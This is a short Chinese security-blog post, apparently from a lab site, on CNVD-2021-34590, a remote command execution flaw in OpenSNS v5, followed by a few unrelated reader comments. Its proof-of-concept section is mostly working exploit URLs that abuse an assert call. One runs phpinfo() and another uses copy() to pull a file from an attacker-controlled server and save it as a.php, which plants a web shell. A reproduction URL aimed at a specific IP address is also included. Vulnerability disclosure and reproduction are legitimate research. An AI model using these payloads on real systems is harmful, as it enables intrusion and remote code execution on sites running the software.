CNVD-2021-34590
漏洞描述:OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令
影响版本:OpenSNS v5
参考资料:
- https://chowdera.com/2021/12/202112291815386593.html
- https://xz.aliyun.com/t/10013
- https://blog.csdn.net/qq_48985780/article/details/122215945
POC:
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=copy(%27http://xxx/a.txt(此处为自己公网服务器ip)%27,%27a.php%27)漏洞复现
http://123.58.224.8:19497/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()
![图片[1]-【初级】OpenSNS 远程命令执行漏洞-NGC660 安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd141855.png)
![图片[2]-【初级】OpenSNS 远程命令执行漏洞-NGC660 安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd141911-1024x627.png)
![图片[3]-【初级】OpenSNS 远程命令执行漏洞-NGC660 安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd141926.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 1个月前0
好的,谢谢昶之琴
1个月前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 1个月前0
帆软部署 ,访问的地址访问不到昶之琴
2年前0
我以为只要提交就行了好想告诉你
2年前0
花巨资看一下